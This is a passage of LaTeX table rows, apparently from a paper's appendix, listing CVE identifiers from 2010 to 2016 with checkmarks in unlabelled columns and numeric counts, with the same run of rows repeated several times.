-CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule -CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule -CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule -CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule -CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule -CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule -CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule -CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule -CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule -CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule -CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule -CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule -CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule -CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule -CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule -CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule -CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule -CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule -CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule -CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule -CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule -CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule -CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule -CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule -CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule -CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule -CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule -CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule -CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule -CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule -CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule -CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule -CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule -CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule -CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule -CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule -CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule -CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule -CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule -CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule -CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule -CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule -CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule -CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule -CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule -CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule -CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule -CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule -CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule -CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule -CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule -CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule -CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule -CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule -CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule -CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule -CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule -CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule -CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule -CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule -CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule -CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule -CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule -CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule -CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule -CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule -CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule -CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule -CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule -CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule -CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule -CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule -CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule -CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule -CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule -CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule -CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule -CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule -CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule -CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule -CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule -CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule -CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule -CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2013-2035 & /checkmark & & & & & /checkmark & 